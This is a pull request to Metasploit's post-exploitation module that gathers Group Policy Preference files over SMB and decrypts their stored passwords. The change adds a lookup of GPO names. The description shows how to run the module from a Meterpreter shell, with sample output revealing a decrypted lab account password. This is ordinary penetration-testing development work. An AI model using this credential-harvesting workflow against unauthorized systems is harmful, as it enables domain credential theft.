### PR TITLE
Update gpp.rb to display the GPO name 

### DIFF
--- a/modules/post/windows/gather/credentials/gpp.rb
+++ b/modules/post/windows/gather/credentials/gpp.rb
@@ -21,10 +21,8 @@ class MetasploitModule < Msf::Post
         connects to it via SMB. It then looks for Group Policy Preference XML
         files containing local user accounts and passwords and decrypts them
         using Microsofts public AES key.
-
         Cached Group Policy files may be found on end-user devices if the group
         policy object is deleted rather than unlinked.
-
         Tested on WinXP SP3 Client and Win2k8 R2 DC.
       },
       'License'       => MSF_LICENSE,
@@ -210,6 +208,18 @@ class MetasploitModule < Msf::Post
     end
   end
 
+  def adsi_query(domain, adsi_filter, adsi_fields)
+    return "" unless session.core.use("extapi")
+
+    query_result = session.extapi.adsi.domain_query(domain, adsi_filter, 255, 255, adsi_fields)
+
+    if query_result[:results].empty?
+      return "" # adsi query failed
+    else
+      return query_result[:results]
+    end
+  end
+
   def gpp_xml_file(path)
     begin
       data = read_file(path)
@@ -217,6 +227,7 @@ class MetasploitModule < Msf::Post
       spath = path.split('\\')
       retobj = {
         :dc     => spath[2],
+        :guid   => spath[6][1..-2],
         :path   => path,
         :xml    => data
       }
@@ -225,6 +236,21 @@ class MetasploitModule < Msf::Post
       else
         retobj[:domain] = spath[4]
       end
+
+      adsi_filter_gpo = "(&(objectCategory=groupPolicyContainer))" 
+      adsi_field_gpo = ['displayname', 'name']
+
+      gpo_adsi = adsi_query(retobj[:domain], adsi_filter_gpo, adsi_field_gpo)
+
+      unless gpo_adsi.empty?
+        gpo_adsi.each do |gpo_entry|
+          gpo_name = gpo_entry[0][:value]
+          gpo_guid = gpo_entry[1][:value][1..-2]
+          # Add the GPO name if the GUID matched the ADSI query
+          retobj[:name] = gpo_name if gpo_guid == retobj[:guid]
+        end
+      end
+
       return retobj
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error "Received error code #{e.code} when reading #{path}"
@@ -241,7 +267,19 @@ class MetasploitModule < Msf::Post
     tables = Rex::Parser::GPP.create_tables(results, filetype, xmlfile[:domain], xmlfile[:dc])
 
     tables.each do |table|
-      print_good table.to_s
+      # We have to manually format the results as we want to insert a new line
+      #  to what 'Rex::Parser::GPP.create_tables' returns
+      print_good "Group Policy Credential Info"
+      print_line "================================\n"
+      print_line " Name               Value"
+      print_line " ----               -----"
+
+      title = " NAME"
+      # If GPO name was found, print it
+      print_line "#{title.ljust(19)} #{xmlfile[:name]}" if xmlfile.member?(:name)
+
+      # Print the rest of the results
+      print " #{table.to_s.split("-----")[1].strip()}\n\n"
     end
 
     results.each do |result|

--- a/modules/post/windows/gather/credentials/gpp.rb
+++ b/modules/post/windows/gather/credentials/gpp.rb
@@ -237,7 +237,7 @@ class MetasploitModule < Msf::Post
         retobj[:domain] = spath[4]
       end
 
-      adsi_filter_gpo = "(&(objectCategory=groupPolicyContainer))" 
+      adsi_filter_gpo = "(&(objectCategory=groupPolicyContainer))"
       adsi_field_gpo = ['displayname', 'name']
 
       gpo_adsi = adsi_query(retobj[:domain], adsi_filter_gpo, adsi_field_gpo)


### PR DESCRIPTION
## What the changes do:
GPO files on SYSVOL do only include the GPO GUID, not the GPO name defined by the administrator. This modification makes this gpp module make an ADSI query to retrieve all of the domain's GPOs, and compare their GUID. If one GUID matches, then we know the GPO name and we can display it. On a pentest, a client is much more interested by knowing the GPO name rather than the obscure GUID. The ADSI query relies on meterpreter "extapi" extension.


## Verification

1. Get a meterpreter shell on a Windows host being in a domain
2.  meterpreter > `run post/windows/gather/credentials/gpp`
3. If the domain has credentials stored in GPO, it will be displayed

# Example
```
[*] Checking for group policy history objects...
[+] Cached Group Policy folder found locally
[*] Checking for SYSVOL locally...
[-] Error accessing C:\WINDOWS\SYSVOL\sysvol : stdapi_fs_ls: Operation failed: The system cannot find the path specified.
[*] Enumerating Domains on the Network...
[*] Retrieved Domain(s) HACKME2 from network
[*] Enumerating domain information from the local registry...
[*] Retrieved Domain(s) HACKME2 from registry
[*] Retrieved DC WIN-VGVKT0O3U4K.HACKME2.LOCAL from registry
[*] Enumerating DCs for HACKME2 on the network...
[+] DC Found: WIN-VGVKT0O3U4K
[*] Searching for Policy Share on WIN-VGVKT0O3U4K...
[+] Found Policy Share on WIN-VGVKT0O3U4K
[*] Searching for Group Policy XML Files...
[*] Parsing file: \\WIN-VGVKT0O3U4K\SYSVOL\hackme2.local\Policies\{D5323F3D-FD71-4A72-9449-6A918DCFFADE}\USER\Preferences\Groups\Groups.xml ...
[+] Group Policy Credential Info
================================

 Name               Value
 ----               -----
 NAME               Local admin
 TYPE               Groups.xml
 USERNAME           localadminyea
 PASSWORD           localadminyea!!
 DOMAIN CONTROLLER  WIN-VGVKT0O3U4K
 DOMAIN             hackme2.local
 CHANGED            2018-10-25 12:59:50
 NEVER_EXPIRES?     0
 DISABLED           0

[+] XML file saved to: /root/.msf4/loot/20190831035335_test2_192.168.56.119_microsoft.window_582450.txt
```

The field **NAME               Local admin** is added at the begining, where "Local admin" is the GPO name in this example.



